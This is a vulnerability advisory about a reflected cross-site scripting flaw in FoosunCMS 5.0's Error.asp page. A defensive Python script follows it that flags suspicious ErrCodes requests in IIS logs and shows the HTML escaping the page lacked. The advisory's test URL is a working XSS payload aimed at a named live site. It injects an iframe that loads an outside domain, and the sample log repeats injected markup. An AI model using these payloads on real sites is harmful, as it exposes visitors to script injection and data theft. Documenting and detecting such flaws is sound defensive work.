Foosun (FoosunCMS) 5.0 Error.asp error page cross-site scripting vulnerability

2010-03-20T00:00:00
ID MYHACK58:62201026485
Type myhack58
Reporter Anonymous
Modified 2010-03-20T00:00:00

Description

FoosunCMS is a feature-rich content management system built on an ASP + Access/MSSQL architecture: a leading domestic product and the first open-source one, a modular CMS site-building system that integrates Web 2.0 elements. FoosunCMS does not correctly filter user input, so a remote attacker could exploit the vulnerability to conduct cross-site scripting attacks and obtain sensitive information. Because the error-handling page is implemented incorrectly, the content it returns to the user can cause malicious script code to execute in the target's browser, leaking sensitive information.

Test Url

http://www.freecms2008.cn/Foosun500/User/lib/Error.asp?ErrCodes=%3Ciframe%20src=http://dgyifeng.net/swf/qing.html%3E&ErrorUrl=http://www.freecms2008.cn/foosun500/
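
A detection sketch for the request pattern above, added here as an example and not part of the original advisory or of FoosunCMS. It scans IIS W3C-style log lines (constructed; the field layout is an assumption) for requests to User/lib/Error.asp whose ErrCodes value contains HTML markup after percent-decoding, including double-encoded input, and shows the HTML-encoded form the error page should have emitted instead.

```python
import html
from urllib.parse import parse_qs, unquote

# Constructed sample log (not from the advisory). Assumed field layout:
# date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2010-03-21 10:02:11 GET /Foosun500/User/lib/Error.asp ErrCodes=Login+failed&ErrorUrl=/foosun500/ 192.0.2.10 200
2010-03-21 10:05:42 GET /Foosun500/User/lib/Error.asp ErrCodes=%3Ciframe%20src=http://example.invalid/x.html%3E&ErrorUrl=/foosun500/ 192.0.2.44 200
2010-03-21 10:06:03 GET /foosun500/user/lib/error.asp errcodes=%253Cscript%253E&ErrorUrl=/foosun500/ 192.0.2.45 200
2010-03-21 10:07:30 GET /Foosun500/index.asp - 192.0.2.10 200
"""

TARGET_SUFFIX = "/user/lib/error.asp"   # path from the advisory's test URL
MARKUP_CHARS = set("<>\"'")             # characters that must never reach HTML raw


def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded markup (%253C) is seen."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_requests(log_text):
    """Return (client_ip, decoded ErrCodes, HTML-encoded form) per flagged request."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if line.startswith("#") or len(fields) != 7:
            continue                     # header or malformed line
        stem, query, ip = fields[3], fields[4], fields[5]
        if not stem.lower().endswith(TARGET_SUFFIX):
            continue                     # classic ASP paths are case-insensitive
        params = {k.lower(): v for k, v in parse_qs(query).items()}
        for raw in params.get("errcodes", []):
            value = fully_decode(raw)
            if MARKUP_CHARS & set(value):
                # html.escape() is the output encoding the page lacked
                hits.append((ip, value, html.escape(value, quote=True)))
    return hits


if __name__ == "__main__":
    for ip, value, encoded in suspicious_requests(SAMPLE_LOG):
        print(f"{ip}\t{value!r}\tsafe rendering: {encoded}")
```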
